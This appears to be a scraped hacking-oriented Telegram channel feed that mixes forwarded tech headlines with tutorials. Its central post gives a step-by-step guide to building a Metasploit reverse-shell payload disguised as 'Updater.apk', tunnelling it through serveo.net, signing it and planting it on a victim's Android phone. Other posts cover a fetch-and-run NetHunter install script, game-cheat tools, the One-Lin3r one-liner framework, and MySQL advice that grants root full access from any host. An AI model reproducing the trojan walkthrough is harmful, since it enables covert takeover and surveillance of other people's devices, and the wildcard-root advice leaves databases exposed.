UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
Forwarded from UNDERCODE NEWS
The winner of the biggest Sberbank-classified Microsoft program in the history of state procurement has been decided.
#international
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 GAMES HACKING ANDROID & IOS:

1) Xmodgames
2) HackerBot
3) Cheat Engine
4) Nox
5) Bluestacks
6) GameCih
7) Using Mods with Private Servers
8) File Manager
9) Lucky Patcher (Root/No Root)
10) Creehack
11) SB Game Hacker
12) LeoPlay Card
13) Game Killer
14) Game Guardian
Forwarded from UNDERCODE NEWS
Kaspersky asked Putin to quickly transfer banks and government agencies to Russian software.
#international
Forwarded from UNDERCODE NEWS
Microsoft continues to improve the Chromium browser core, which is beneficial to the entire browser industry.
#Updates
🦑 For pro hackers: detailed explanation of MyBatis query methods with parameters:

#{} placeholder

This works like PreparedStatement in JDBC: the position of each required parameter in the SQL statement is occupied by a ?, and the passed-in argument is then bound to it. Everything bound through ? is a value, so it cannot be used to specify a table or a column. If a table name is passed this way, it is treated as a string when converted to SQL, which causes an error; this is what prevents SQL injection.

select username,age,password from 'tb_user'
Simple type parameter

Simple types are: primitive data types, their wrapper types, String and java.sql.*. When the parameter is a simple type, MyBatis ignores the number of parameters in the SQL statement and the name of the placeholder, and binds the parameter automatically. The parameterType attribute can define the type of the parameter. If it is defined, the argument passed in must be consistent with the specified type; otherwise a ClassCastException is thrown.

<select id="selBaseType" resultType="pojo.User" parameterType="java.lang.Integer">
select * from tb_users where id=#{id}
</select>

User user=sqlSession.selectOne("selBaseType",1);
Map type parameters

When the parameter is a Map, the #{} in the SQL statement should contain the key of the Map entry. MyBatis looks up the value by that key and then binds it. If the key does not exist, no error is reported and null is used for the parameter binding.

<select id="selByMap" resultType="pojo.User">
select * from tb_users where username=#{username} and password=#{password}
</select>


Map<String,String> map=new HashMap<>();
map.put("username","zhangsan");
map.put("password","123456");
User user=sqlSession.selectOne("selByMap",map);
Object type parameter passing

When the parameter is an object type, the property name corresponding to the getter method of the object should be written in #{} in the SQL statement. When the getter method does not exist, an exception is thrown.


<select id="selByObject" resultType="pojo.User">
select * from tb_users where username=#{username} and password=#{password}
</select>

User user1=new User();
user1.setUsername("lisi");
user1.setPassword("123456");
User user=sqlSession.selectOne("selByObject",user1);
${}

This works like Statement in JDBC: the passed-in parameters are concatenated directly into the SQL string. It is generally used when the structure of the SQL statement is not fixed.
When the table name, the condition or the sorting rule is not known in advance, #{} cannot be used and ${} should be used instead. For simple data types, use #{} wherever possible to avoid errors.
With ${}, the incoming parameter must be wrapped in '' to become a string; otherwise it is treated as a column name.

select * from tb_users where username='${username}' and password='${password}'
If you write ${123}, the number itself replaces the placeholder as an integer, and the parameter passed in has no effect.
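
The difference between the two placeholders, as an added example that is not part of the original post: a Python/sqlite3 emulation (not MyBatis itself) in which #{} becomes a bound ? and ${} is pasted into the SQL text, run against the post's login query. The sample rows, the render/select helpers and the SORTABLE allow-list are assumptions made for the illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample rows; table and column names follow the post's examples.
    db = sqlite3.connect(":memory:")
    db.execute("create table tb_users (id integer, username text, password text)")
    db.executemany("insert into tb_users values (?,?,?)",
                   [(1, "zhangsan", "123456"), (2, "lisi", "abcdef")])
    return db

TOKEN = re.compile(r"([#$])\{(\w+)\}")

def render(template, params):
    """Emulate both modes: #{x} becomes a bound '?', ${x} is pasted in verbatim."""
    bound = []
    def sub(match):
        kind, key = match.group(1), match.group(2)
        if kind == "#":
            bound.append(params.get(key))  # a missing key binds NULL, as the post notes
            return "?"
        return str(params[key])            # raw text substitution into the statement
    return TOKEN.sub(sub, template), bound

def select(db, template, params):
    sql, bound = render(template, params)
    return db.execute(sql, bound).fetchall()

LOGIN_RAW = "select * from tb_users where username='${username}' and password='${password}'"
LOGIN_BOUND = "select * from tb_users where username=#{username} and password=#{password}"

# ${} is still needed for identifiers such as a sort column, so the value is
# restricted to a fixed set of known column names before it reaches the SQL text.
SORTABLE = {"id", "username"}

def select_sorted(db, column):
    if column not in SORTABLE:
        raise ValueError("unsupported sort column: %r" % column)
    return select(db, "select username from tb_users order by ${col}", {"col": column})

if __name__ == "__main__":
    db = make_db()
    crafted = {"username": "zhangsan", "password": "' or '1'='1"}
    print(render(LOGIN_RAW, crafted)[0])          # the quote closes the literal early
    print(len(select(db, LOGIN_RAW, crafted)))    # every row matches
    print(len(select(db, LOGIN_BOUND, crafted)))  # compared as a plain value, no match
```

With ${} the crafted password rewrites the WHERE clause and the query returns every user; with #{} the same input is only a value that matches nothing.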

Forwarded from UNDERCODE NEWS
Critical vulnerability in Drupal leaving millions of websites vulnerable.
#Vulnerabilities
🦑 Kali Linux on Android in a few steps:


INSTALLATION & RUN:

1) pkg install wget

2) wget -O install-nethunter-termux https://offs.ec/2MceZWr

3) chmod +x install-nethunter-termux

4) ./install-nethunter-termux

F E A T U R E S :

Kali NetHunter app

The main screen is a panel of general information, network interfaces and the status of the HID device.
Kali Chroot Manager - for managing chroot metapackage installations.
Kali Services - start / stop various chrooted services. Enable or disable them at boot time.
Custom Commands - Add your own commands and functions to the launcher.
MAC Changer - change the Wi-Fi MAC address (only on certain devices)
KeX Manager - Set up an instant VNC session with your Kali chroot.
USB Arsenal - Manage USB Gadgets Configurations
HID [Attacks] - Various HID attacks, Teensy style.
DuckHunter HID - Rubber Ducky Hidden Attacks
BadUSB MITM Attack
MANA Wireless Toolkit - Configure a malicious hotspot with one click.
MITM..
Forwarded from UNDERCODE NEWS
83% of Chrome users do not update despite Google's successive zero-day announcements.
#Vulnerabilities #international
🦑 MySQL 8.0 method to set remote access permissions:

1. Log in to MySQL


mysql -u root -p
Enter your password

2. Choose mysql database


use mysql;
This is because the user table, which holds the user information, is stored in the mysql database.

3. View the relevant information of the current root user in the user table of the mysql database


select host, user, authentication_string, plugin from user;
After executing the above command, a table will be displayed

Check the host of the root user in the table. The default localhost should be displayed, which only supports local access and does not allow remote access.

4. Authorize all permissions of the root user and set up remote access


GRANT ALL ON *.* TO 'root'@'%';
GRANT ALL ON grants all privileges; % is a wildcard for the host, meaning that every host can access the server remotely.

5. Refresh permissions

This should be run after all of the operations above:


flush privileges;
6. View the host of the root user

Perform step 2 again; you will find that the root user's host has become %, indicating that the modification succeeded and the server can be accessed remotely.

7. Access the database

There are many visualization tools for remote access to the database, such as Navicat, SQLyog, MySQL workbench, etc

Enter the host and password for access, and a 2059 error is reported. This is because the encryption rules of MySQL 8.0 and 5.0 are different, and the current visualization tool only supports the old encryption method.

There are two ways to solve this problem: one is to update the Navicat driver, the other is to change the encryption rule for MySQL user login to mysql_native_password. The first method I tried did not work, so I use the second method.

8. Modify encryption rules


ALTER USER 'root'@'localhost' IDENTIFIED BY 'password' PASSWORD EXPIRE NEVER;
password is your current password.

9. Update root user password


ALTER USER 'root'@'%' IDENTIFIED WITH mysql_native_password BY 'password';
password is your newly set password.

10. Refresh permissions


FLUSH PRIVILEGES;
OK, the setting is complete. Use Navicat again to connect to the database.

This concludes the article on setting remote access permissions for MySQL 8.0.
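
A check to run over the output of the step 3 query once accounts have been changed this way, as an added example that is not part of the original post: it parses the table printed by the mysql client and flags accounts whose host is % and accounts using the old mysql_native_password plugin. The sample table is constructed (authentication_string column left out), and ADMIN_USERS is an assumption about which accounts count as administrative.

```python
# Constructed sample of the table printed by the mysql client for
# "select host, user, plugin from user;" after the steps above.
SAMPLE = """\
+-----------+-----------+-----------------------+
| host      | user      | plugin                |
+-----------+-----------+-----------------------+
| %         | root      | mysql_native_password |
| localhost | mysql.sys | caching_sha2_password |
| localhost | root      | caching_sha2_password |
| %         | report    | caching_sha2_password |
+-----------+-----------+-----------------------+
"""

ADMIN_USERS = {"root"}  # assumption: account names treated as administrative

def parse_table(text):
    """Turn the client's ASCII table into a list of dicts keyed by column name."""
    rows, header = [], None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue  # skip the +---+ border lines and anything else
        cells = [cell.strip() for cell in line.strip().strip("|").split("|")]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows

def audit(rows):
    """Return (account, finding) pairs for wildcard hosts and the old plugin."""
    findings = []
    for row in rows:
        account = "'%s'@'%s'" % (row["user"], row["host"])
        if row["host"] == "%":
            if row["user"] in ADMIN_USERS:
                findings.append((account, "administrative account reachable from any host"))
            else:
                findings.append((account, "account reachable from any host"))
        if row.get("plugin") == "mysql_native_password":
            findings.append((account, "old mysql_native_password plugin"))
    return findings

if __name__ == "__main__":
    for account, finding in audit(parse_table(SAMPLE)):
        print(account, "-", finding)
```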


Forwarded from UNDERCODE NEWS
A Super SIM card will be launched by China Mobile: it can be used as a meal card, door card and large transfers
#Technologies #Updates
🦑 How to Hack Android Phone Using Another Android Phone?

YOU NEED:

1). Android 5.0 (or later. Tutorial for older versions will be published shortly ...)


2). TermuX Android App (Download from Play Store)


3). Installed Metasploit Framework in TermuX (tutorial here)


4). Active internet / WiFi connection


5). TermuX must be allowed to use external storage (just enter this command at once: "termux-setup-storage")


6). MiXplorer (download the APK file from UpToDown to sign the APK)


7). MiX Signer (APK Signer for MiXplorer, download it from the Play store)


🦑 Step 1: Port forwarding

Many people use NGROK for port forwarding. But in NGROK you can see that it will create a new domain or port when you reconnect to it. The reserved domain and port are unfortunately only available to paid or their premium customers. That's why for NGROK you have to generate a new APK every time you start hacking.

BUT HERE ... we will be using Serveo. In Serveo, you can manually forward the desired port on the internet (and you can forward it again in the future). To use Serveo port forwarding, you must install the OpenSSH package for TermuX. To do this, enter this command in TermuX:

pkg install openssh


- It will install OpenSSH successfully

Once installed, just enter this:

ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net


- Details below

It might ask you about the default ssh or something like that. Just enter yes when it asks about it.

There are some points to keep in mind here; If you want to redirect the HTTP port, then select different ports in both Desired_Port fields. But here we will redirect the TCP port. To forward a TCP port, you must enter the same desired ports in the Desired_Ports field. Also don't change "localhost". Here we are going to forward TCP port: 4564 (for example only). After forwarding

🦑 Step 2: Build an APK with an embedded payload

To generate an APK with an embedded payload, enter this command in the NEW SESSION:

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > Storage/Downloads/Updater.apk


- The link to Updater.apk is in the next third paragraph


Wait a minute ...



Ok ... Now the APK file with the embedded payload is successfully generated here: Phone / SD card storage -> Downloads -> Updater.apk

(OPTIONAL) You can use APK Editor Pro to change the name (default: MainActivity) and version of the generated APK file.


(Remember: This APK is not signed! You must sign it before using it to avoid problems.)


🦑 Step 3: Signing the newly generated APK file

To sign the newly generated APK file,


Open MiXplorer File Manager and navigate to "Un-Signed APK File (Updater.apk)" (will be in your downloads folder).



Long press on "Un-Signed APK File (Updater.apk)" and select "MENU button" in the upper right corner of MiXplorer, then select "SIGN".


It will display various options for signing the APK (but "AUTO" is preferred).

Select AUTO to automatically and successfully sign the APK file.



Your APK file, (filename)-signed.apk, is now successfully signed and fully functional and is 9.9KB in size.


🦑 Step 4: Configuring Metasploit in TermuX

Activate the Metasploit Framework in TermuX by entering this command in a new session:

msfconsole


- Metasploit Framework Console

mkdir -p $PREFIX/var/lib/postgresql

initdb $PREFIX/var/lib/postgresql

pg_ctl -D $PREFIX/var/lib/postgresql start


- Thanks to DUST WORLD for this fix ... !!!


Wait a minute ...


Now that msfconsole starts, type the following (bold) commands, one by one, carefully:

msf> use exploit/multi/handler

msf> set payload android/meterpreter/reverse_tcp

msf> set LHOST localhost

msf> set LPORT 4564

msf> exploit -j -z


- enter only bold commands


Step 5. Installing the APK on the victim's Android device.
sessions -i (session id)


- (Session ID) = 1, 2, 3, 4 or 5 ...

Forwarded from UNDERCODE NEWS
Many vulnerabilities have been patched in VMware that could allow an attacker to exploit the whole system.
#Vulnerabilities
Forwarded from UNDERCODE NEWS
Suddenly, Huawei's commercial desktop PC is here! Want to move the cake?
#Technologies
🦑 Updated Windows hacking
One-Lin3r is a simple, modular and lightweight framework that gives you all the one-liners you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally, with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).

INSTALLATION & RUN:

A) For Linux Debian-based distros. (Ex: Kali, Ubuntu..):
1) git clone https://github.com/D4Vinci/One-Lin3r.git

2) sudo apt install libncurses5-dev

3) sudo pip3 install ./One-Lin3r --user
one-lin3r -h

B) For the rest Linux distros.:

1) git clone https://github.com/D4Vinci/One-Lin3r.git

2) sudo pip3 install ./One-Lin3r --user
one-lin3r -h

F E A T U R E S ::
It's designed to fix typos in typed commands to the most similar command with just one tab click, so seach becomes search and so on, even if you typed any random word similar to a command in this framework.
For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...

Forwarded from UNDERCODE NEWS
From the IT perspective Predicting Biden’s US in 2021
#Analytiques